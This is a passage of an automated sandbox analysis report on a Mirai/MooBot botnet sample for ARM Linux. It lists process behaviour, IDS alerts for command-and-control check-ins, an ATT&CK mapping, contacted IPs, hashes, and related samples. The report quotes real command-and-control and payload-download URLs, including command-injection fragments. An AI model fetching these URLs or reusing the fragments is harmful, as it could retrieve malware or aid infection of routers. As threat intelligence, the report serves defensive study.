            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/16/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/17/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/18/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/1594/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/120/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/121/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/1349/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/1/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/122/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/243/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/123/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/2/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/124/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/3/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/4/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/125/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/126/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/1344/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/1465/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/1586/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/127/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/6/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/248/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/128/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/249/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/1463/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/800/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/6238/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/9/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/801/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/6239/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/20/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/21/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/1900/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/22/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/23/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/24/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/25/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/26/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/6256/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/27/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/28/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/6258/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/29/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/491/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/250/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/130/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/251/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/252/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/132/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/253/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/254/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/255/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/256/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/1599/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/257/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/1477/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/379/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/258/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/1476/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/259/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/1475/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/936/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/4503/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/30/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/2208/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/4506/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/6262/cmdlineJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 34794 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34794 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34794 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49084 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55300 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 55300
            Source: /tmp/huhu.arm7.elf (PID: 6254)Queries kernel information via 'uname': Jump to behavior
            Source: huhu.arm7.elf, 6254.1.0000561a84985000.0000561a84ad5000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
            Source: huhu.arm7.elf, 6254.1.0000561a84985000.0000561a84ad5000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/arm
            Source: huhu.arm7.elf, 6254.1.00007ffd5415b000.00007ffd5417c000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
            Source: huhu.arm7.elf, 6254.1.00007ffd5415b000.00007ffd5417c000.rw-.sdmpBinary or memory string: 93@x86_64/usr/bin/qemu-arm/tmp/huhu.arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/huhu.arm7.elf

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: huhu.arm7.elf, type: SAMPLE
            Source: Yara matchFile source: 6254.1.00007fdb48017000.00007fdb48034000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: huhu.arm7.elf PID: 6254, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
            Source: Yara matchFile source: huhu.arm7.elf, type: SAMPLE
            Source: Yara matchFile source: 6254.1.00007fdb48017000.00007fdb48034000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: huhu.arm7.elf PID: 6254, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid AccountsWindows Management Instrumentation1
            Scripting
            Path Interception1
            Masquerading
            1
            OS Credential Dumping
            11
            Security Software Discovery
            Remote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media11
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging3
            Ingress Tool Transfer
            Scheduled TransferData Encrypted for Impact
            No configs have been found
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1382471 Sample: huhu.arm7.elf Startdate: 29/01/2024 Architecture: LINUX Score: 100 26 haha.skyljne.click 2->26 28 101.55.217.145 VECTANTARTERIANetworksCorporationJP Japan 2->28 30 99 other IPs or domains 2->30 32 Snort IDS alert for network traffic 2->32 34 Malicious sample detected (through community Yara rule) 2->34 36 Antivirus / Scanner detection for submitted sample 2->36 38 4 other signatures 2->38 8 huhu.arm7.elf 2->8         started        10 gnome-session-binary sh gsd-print-notifications 2->10         started        12 gdm3 Default 2->12         started        14 gdm3 Default 2->14         started        signatures3 process4 process5 16 huhu.arm7.elf 8->16         started        process6 18 huhu.arm7.elf 16->18         started        20 huhu.arm7.elf 16->20         started        22 huhu.arm7.elf 16->22         started        24 2 other processes 16->24
            SourceDetectionScannerLabelLink
            huhu.arm7.elf50%ReversingLabsLinux.Trojan.Mirai
            huhu.arm7.elf43%VirustotalBrowse
            huhu.arm7.elf100%AviraEXP/ELF.Mirai.Gen.J
            No Antivirus matches
            SourceDetectionScannerLabelLink
            haha.skyljne.click12%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://45.142.182.123/huhu.mpsl;0%Avira URL Cloudsafe
            http://103.245.236.146/huhu.mips;$100%Avira URL Cloudmalware
            http://103.245.236.146/huhu.mips;$19%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            haha.skyljne.click
            45.142.182.123
            truetrueunknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://103.245.236.146/huhu.mips;$huhu.arm7.elffalse
            • 19%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            http://schemas.xmlsoap.org/soap/encoding/huhu.arm7.elffalse
              high
              http://45.142.182.123/huhu.mpsl;huhu.arm7.elffalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/soap/envelope/huhu.arm7.elffalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                41.99.68.182
                unknownAlgeria
                36947ALGTEL-ASDZfalse
                120.59.11.243
                unknownIndia
                17813MTNL-APMahanagarTelephoneNigamLimitedINfalse
                1.209.185.128
                unknownKorea Republic of
                18305POSNETPOSCOICTKRfalse
                141.101.234.189
                unknownNetherlands
                25379PEKITEL-ASRUfalse
                41.186.122.29
                unknownRwanda
                36890MTNRW-ASNRWfalse
                75.242.247.222
                unknownUnited States
                22394CELLCOUSfalse
                187.93.43.147
                unknownBrazil
                10429TELEFONICABRASILSABRfalse
                91.120.127.74
                unknownHungary
                5588GTSCEGTSCentralEuropeAntelGermanyCZfalse
                41.165.218.90
                unknownSouth Africa
                36937Neotel-ASZAfalse
                73.70.64.8
                unknownUnited States
                7922COMCAST-7922USfalse
                151.79.218.49
                unknownItaly
                1267ASN-WINDTREIUNETEUfalse
                35.32.118.77
                unknownUnited States
                36375UMICH-AS-5USfalse
                142.121.109.23
                unknownCanada
                577BACOMCAfalse
                34.240.188.209
                unknownUnited States
                16509AMAZON-02USfalse
                27.130.219.176
                unknownThailand
                45758TRIPLETNET-AS-APTripleTInternetTripleTBroadbandTHfalse
                85.150.25.161
                unknownNetherlands
                5390EURONETNLfalse
                57.74.95.116
                unknownBelgium
                51964ORANGE-BUSINESS-SERVICES-IPSN-ASNFRfalse
                46.152.103.239
                unknownSaudi Arabia
                35819MOBILY-ASEtihadEtisalatCompanyMobilySAfalse
                157.24.67.234
                unknownFinland
                1741FUNETASFIfalse
                122.53.128.137
                unknownPhilippines
                9299IPG-AS-APPhilippineLongDistanceTelephoneCompanyPHfalse
                163.20.187.75
                unknownTaiwan; Republic of China (ROC)
                1659ERX-TANET-ASN1TaiwanAcademicNetworkTANetInformationCfalse
                218.75.250.104
                unknownChina
                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                183.121.50.9
                unknownKorea Republic of
                4766KIXS-AS-KRKoreaTelecomKRfalse
                40.73.110.161
                unknownChina
                58593BLUECLOUDShanghaiBlueCloudTechnologyCoLtdCNfalse
                204.105.4.70
                unknownUnited States
                1239SPRINTLINKUSfalse
                128.10.214.117
                unknownUnited States
                17PURDUEUSfalse
                54.91.11.47
                unknownUnited States
                14618AMAZON-AESUSfalse
                108.151.240.46
                unknownUnited States
                16509AMAZON-02USfalse
                128.18.50.187
                unknownUnited States
                264SRINET-ASUSfalse
                130.162.58.195
                unknownUnited States
                43898ORCL-AM-OPC1NLfalse
                157.157.40.87
                unknownIceland
                6677ICENET-AS1ISfalse
                41.82.95.118
                unknownSenegal
                8346SONATEL-ASAutonomousSystemEUfalse
                101.55.217.145
                unknownJapan2519VECTANTARTERIANetworksCorporationJPfalse
                54.243.247.62
                unknownUnited States
                14618AMAZON-AESUSfalse
                50.255.174.47
                unknownUnited States
                7922COMCAST-7922USfalse
                130.6.210.183
                unknownUnited States
                6908DATAHOPDatahop-SixDegreesGBfalse
                163.163.23.75
                unknownBelgium
                5609ASN-CSELTAS-CSELTCONVERTEDTOASN-CSELTFORRPSLCOMPLIAfalse
                199.10.211.168
                unknownUnited States
                5972DNIC-ASBLK-05800-06055USfalse
                185.70.34.134
                unknownUnited Kingdom
                201353NSUKGBfalse
                138.83.39.75
                unknownUnited States
                58611CDU-AS-APCharlesDarwinUniversityAUfalse
                51.208.212.159
                unknownUnited States
                2686ATGS-MMD-ASUSfalse
                105.79.120.19
                unknownMorocco
                36884MAROCCONNECTMAfalse
                116.161.214.171
                unknownChina
                4847CNIX-APChinaNetworksInter-ExchangeCNfalse
                165.227.55.111
                unknownUnited States
                14061DIGITALOCEAN-ASNUSfalse
                41.253.208.55
                unknownLibyan Arab Jamahiriya
                21003GPTC-ASLYfalse
                197.192.154.244
                unknownEgypt
                36992ETISALAT-MISREGfalse
                166.191.126.232
                unknownUnited States
                20057ATT-MOBILITY-LLC-AS20057USfalse
                80.227.151.226
                unknownUnited Arab Emirates
                15802DU-AS1AEfalse
                167.100.152.224
                unknownSaudi Arabia
                25019SAUDINETSTC-ASSAfalse
                105.58.241.47
                unknownKenya
                33771SAFARICOM-LIMITEDKEfalse
                83.214.224.198
                unknownFrance
                12322PROXADFRfalse
                203.190.99.38
                unknownChina
                4637ASN-TELSTRA-GLOBALTelstraGlobalHKfalse
                41.141.24.250
                unknownMorocco
                36903MT-MPLSMAfalse
                137.128.115.132
                unknownUnited States
                668DNIC-AS-00668USfalse
                114.14.99.19
                unknownIndonesia
                56046CMNET-JIANGSU-APChinaMobilecommunicationscorporationCNfalse
                90.16.108.179
                unknownFrance
                3215FranceTelecom-OrangeFRfalse
                41.224.152.229
                unknownTunisia
                37492ORANGE-TNfalse
                197.60.6.40
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                41.165.218.83
                unknownSouth Africa
                36937Neotel-ASZAfalse
                159.42.98.178
                unknownUnited States
                25019SAUDINETSTC-ASSAfalse
                84.92.39.165
                unknownUnited Kingdom
                6871PLUSNETUKInternetServiceProviderGBfalse
                199.16.193.122
                unknownUnited States
                394563ATSG-REDICLOUDUSfalse
                97.219.177.199
                unknownUnited States
                6167CELLCO-PARTUSfalse
                185.22.127.127
                unknownCzech Republic
                33883TRIONET-CZ-ASNIXCZfalse
                82.191.122.87
                unknownItaly
                3269ASN-IBSNAZITfalse
                151.83.84.20
                unknownItaly
                1267ASN-WINDTREIUNETEUfalse
                157.29.93.241
                unknownItaly
                8968BT-ITALIAITfalse
                86.240.156.119
                unknownFrance
                3215FranceTelecom-OrangeFRfalse
                41.143.199.208
                unknownMorocco
                36903MT-MPLSMAfalse
                189.79.75.83
                unknownBrazil
                27699TELEFONICABRASILSABRfalse
                132.229.26.238
                unknownNetherlands
                1103SURFNET-NLSURFnetTheNetherlandsNLfalse
                125.165.18.25
                unknownIndonesia
                7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDfalse
                77.213.199.20
                unknownDenmark
                9158TELENOR_DANMARK_ASDKfalse
                155.135.68.70
                unknownUnited States
                2152CSUNET-NWUSfalse
                67.18.183.184
                unknownUnited States
                36351SOFTLAYERUSfalse
                12.204.135.239
                unknownUnited States
                7018ATT-INTERNET4USfalse
                84.76.228.122
                unknownSpain
                12479UNI2-ASESfalse
                87.0.46.208
                unknownItaly
                3269ASN-IBSNAZITfalse
                2.227.70.97
                unknownItaly
                12874FASTWEBITfalse
                206.29.47.32
                unknownUnited States
                3561CENTURYLINK-LEGACY-SAVVISUSfalse
                140.122.137.221
                unknownTaiwan; Republic of China (ROC)
                38844NTNU-TWNationalTaiwanNormalUniversityTWfalse
                85.152.244.248
                unknownSpain
                12946TELECABLESpainESfalse
                157.29.34.41
                unknownItaly
                8968BT-ITALIAITfalse
                176.168.50.85
                unknownFrance
                5410BOUYGTEL-ISPFRfalse
                131.101.233.153
                unknownUnited States
                42473AS-ANEXIAANEXIAInternetdienstleistungsGmbHATfalse
                34.112.96.100
                unknownUnited States
                19527GOOGLE-2USfalse
                57.135.72.56
                unknownBelgium
                2686ATGS-MMD-ASUSfalse
                136.227.248.209
                unknownUnited States
                600OARNET-ASUSfalse
                106.66.184.152
                unknownIndia
                45271ICLNET-AS-APIdeaCellularLimitedINfalse
                95.7.35.2
                unknownTurkey
                9121TTNETTRfalse
                190.255.99.92
                unknownColombia
                3816COLOMBIATELECOMUNICACIONESSAESPCOfalse
                41.128.184.209
                unknownEgypt
                24863LINKdotNET-ASEGfalse
                196.186.80.88
                unknownTunisia
                5438ATI-TNfalse
                69.25.30.68
                unknownUnited States
                10913INTERNAP-BLKUSfalse
                100.178.126.199
                unknownUnited States
                21928T-MOBILE-AS21928USfalse
                44.200.22.18
                unknownUnited States
                14618AMAZON-AESUSfalse
                34.17.171.200
                unknownUnited States
                2686ATGS-MMD-ASUSfalse
                118.64.199.52
                unknownChina
                4713OCNNTTCommunicationsCorporationJPfalse
                155.115.43.141
                unknownUnited States
                11003PANDGUSfalse
                41.210.115.148
                unknownunknown
                29614GHANATEL-ASGHfalse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                41.99.68.182ObGionhP0q.elfGet hashmaliciousMirai, MoobotBrowse
                  db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                    41.186.122.29BI25nzcFS0Get hashmaliciousUnknownBrowse
                      34.240.188.209E5beoOxrenGet hashmaliciousMiraiBrowse
                        91.120.127.74CWU0uX3bV5Get hashmaliciousMiraiBrowse
                          VAQTp83c4KGet hashmaliciousMiraiBrowse
                            Hilix.arm7Get hashmaliciousMiraiBrowse
                              46.152.103.239arm-20220406-2027Get hashmaliciousMirai MoobotBrowse
                                41.165.218.90BJkmdaDcpj.elfGet hashmaliciousMiraiBrowse
                                  73IQC7zT52.elfGet hashmaliciousMirai, MoobotBrowse
                                    bk.arm4-20220929-1806.elfGet hashmaliciousMiraiBrowse
                                      y34sa85gEtGet hashmaliciousGafgyt, MiraiBrowse
                                        SH5wPWz5ONGet hashmaliciousMiraiBrowse
                                          armGet hashmaliciousMiraiBrowse
                                            157.24.67.234a6iwYJaJIc.elfGet hashmaliciousMirai, MoobotBrowse
                                              122.53.128.137telarm7.elfGet hashmaliciousMiraiBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                haha.skyljne.clickhuhu.arm.elfGet hashmaliciousMiraiBrowse
                                                • 45.142.182.123
                                                huhu.mips.elfGet hashmaliciousMiraiBrowse
                                                • 45.142.182.123
                                                huhu.x86_64.elfGet hashmaliciousMiraiBrowse
                                                • 45.142.182.123
                                                skyljnee.arm-20240128-0910.elfGet hashmaliciousMiraiBrowse
                                                • 103.245.236.146
                                                skyljnee.mips-20240128-0910.elfGet hashmaliciousMiraiBrowse
                                                • 103.245.236.146
                                                skyljnee.x86-20240128-0910.elfGet hashmaliciousMiraiBrowse
                                                • 103.245.236.146
                                                skyljnee.x86_64-20240128-0910.elfGet hashmaliciousMiraiBrowse
                                                • 103.245.236.146
                                                skyljnee.arm7-20240128-0910.elfGet hashmaliciousMiraiBrowse
                                                • 103.245.236.146
                                                skyljnee.mpsl-20240128-0910.elfGet hashmaliciousMiraiBrowse
                                                • 103.245.236.146
                                                skyljnee.arm5-20240128-0910.elfGet hashmaliciousMiraiBrowse
                                                • 103.245.236.146
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                MTNL-APMahanagarTelephoneNigamLimitedINNrhVe4v2Zt.elfGet hashmaliciousMiraiBrowse
                                                • 120.63.173.21
                                                yonariVpu7.elfGet hashmaliciousMiraiBrowse
                                                • 120.60.12.16
                                                skyljne.arm7.elfGet hashmaliciousMiraiBrowse
                                                • 120.59.35.30
                                                skyljne.x86.elfGet hashmaliciousMiraiBrowse
                                                • 59.177.44.95
                                                L2IuyoaB0y.elfGet hashmaliciousMiraiBrowse
                                                • 120.63.173.17
                                                SecuriteInfo.com.Linux.Siggen.9999.15798.13010.elfGet hashmaliciousMiraiBrowse
                                                • 182.57.89.233
                                                DRcqrj4ODx.elfGet hashmaliciousMiraiBrowse
                                                • 120.61.111.11
                                                skyljne.arm.elfGet hashmaliciousMiraiBrowse
                                                • 59.182.57.238
                                                telarm7.elfGet hashmaliciousMiraiBrowse
                                                • 120.58.140.202
                                                ALGTEL-ASDZhuhu.arm.elfGet hashmaliciousMiraiBrowse
                                                • 41.97.63.171
                                                huhu.mips.elfGet hashmaliciousMiraiBrowse
                                                • 41.108.48.170
                                                CS79lIaAP3.elfGet hashmaliciousMiraiBrowse
                                                • 197.118.79.235
                                                WWIwWJ34x1.elfGet hashmaliciousMiraiBrowse
                                                • 41.96.24.45
                                                skyljnee.x86_64-20240128-0910.elfGet hashmaliciousMiraiBrowse
                                                • 41.108.223.80
                                                skyljnee.arm7-20240128-0910.elfGet hashmaliciousMiraiBrowse
                                                • 41.97.63.117
                                                skyljnee.mpsl-20240128-0910.elfGet hashmaliciousMiraiBrowse
                                                • 197.206.51.3
                                                skyljnee.arm5-20240128-0910.elfGet hashmaliciousMiraiBrowse
                                                • 197.202.209.197
                                                BmXGd4hx74.elfGet hashmaliciousMiraiBrowse
                                                • 41.97.145.250
                                                zD14KmNUNc.elfGet hashmaliciousMiraiBrowse
                                                • 197.202.110.212
                                                POSNETPOSCOICTKRskyljne.arm7.elfGet hashmaliciousMiraiBrowse
                                                • 211.118.184.225
                                                soHSLmkz88.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 1.209.185.136
                                                HGi9IZO85i.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 203.245.221.165
                                                9MJs9phXJA.elfGet hashmaliciousMiraiBrowse
                                                • 1.209.185.111
                                                460eBVV1g4.elfGet hashmaliciousUnknownBrowse
                                                • 169.140.62.92
                                                KqVmsPag8G.elfGet hashmaliciousMiraiBrowse
                                                • 203.245.133.161
                                                ckQ1TWOjRT.elfGet hashmaliciousMiraiBrowse
                                                • 1.209.185.10
                                                6kSGLAbblu.elfGet hashmaliciousMiraiBrowse
                                                • 211.118.184.200
                                                OnHACEHRbH.elfGet hashmaliciousMiraiBrowse
                                                • 203.245.133.167
                                                vXd5JGpmcq.elfGet hashmaliciousMiraiBrowse
                                                • 1.209.185.118
                                                PEKITEL-ASRUuC9E5Eb7Xd.elfGet hashmaliciousMiraiBrowse
                                                • 141.101.234.184
                                                ZI20bfFKqtGet hashmaliciousMiraiBrowse
                                                • 141.101.234.194
                                                4vQDbYLbtjGet hashmaliciousMiraiBrowse
                                                • 141.101.234.190
                                                phantom.armGet hashmaliciousMiraiBrowse
                                                • 141.101.234.183
                                                MTNRW-ASNRWCS79lIaAP3.elfGet hashmaliciousMiraiBrowse
                                                • 41.186.122.46
                                                skyljnee.arm-20240128-0910.elfGet hashmaliciousMiraiBrowse
                                                • 41.186.210.230
                                                51ym2AIoo2.elfGet hashmaliciousMiraiBrowse
                                                • 41.186.210.216
                                                x86-20240125-1453.elfGet hashmaliciousMiraiBrowse
                                                • 41.186.210.206
                                                SecuriteInfo.com.Linux.Siggen.9999.634.18850.elfGet hashmaliciousMiraiBrowse
                                                • 41.186.122.87
                                                SecuriteInfo.com.Linux.Siggen.9999.21075.6657.elfGet hashmaliciousMiraiBrowse
                                                • 41.186.146.58
                                                Fs4mRG2VXI.elfGet hashmaliciousMiraiBrowse
                                                • 41.186.122.53
                                                ZgNq4f7FBn.elfGet hashmaliciousMiraiBrowse
                                                • 41.186.33.160
                                                huhu.mips.elfGet hashmaliciousMiraiBrowse
                                                • 41.186.122.51
                                                ghKTkhYxCQ.elfGet hashmaliciousMiraiBrowse
                                                • 41.186.146.10
                                                No context
                                                No context
                                                Process:/tmp/huhu.arm7.elf
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):19
                                                Entropy (8bit):3.7216117239699025
                                                Encrypted:false
                                                SSDEEP:3:TgCJvC:TgCJa
                                                MD5:4EAC251B3563AD8FD84F82E0973554A3
                                                SHA1:C8938E08FDA4B7A85A0A8D63DAB7AFC74BFA4016
                                                SHA-256:F75B6C4AD7AB8C1995CA599FA49EF5B94E3B80BF81CE5E2F4B87ECF624EC64C1
                                                SHA-512:F02612DB6A9BD6C00E997F7E7CA537DDDCEBE00D4E9CC197BBCBECC2772830096BC757378E18AAE747631FA9E2E6D337F989F51ED8AC680028200B8477ADDB35
                                                Malicious:false
                                                Reputation:low
                                                Preview:/tmp/huhu.arm7.elf.
                                                Process:/tmp/huhu.arm7.elf
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):19
                                                Entropy (8bit):3.7216117239699025
                                                Encrypted:false
                                                SSDEEP:3:TgCJvC:TgCJa
                                                MD5:4EAC251B3563AD8FD84F82E0973554A3
                                                SHA1:C8938E08FDA4B7A85A0A8D63DAB7AFC74BFA4016
                                                SHA-256:F75B6C4AD7AB8C1995CA599FA49EF5B94E3B80BF81CE5E2F4B87ECF624EC64C1
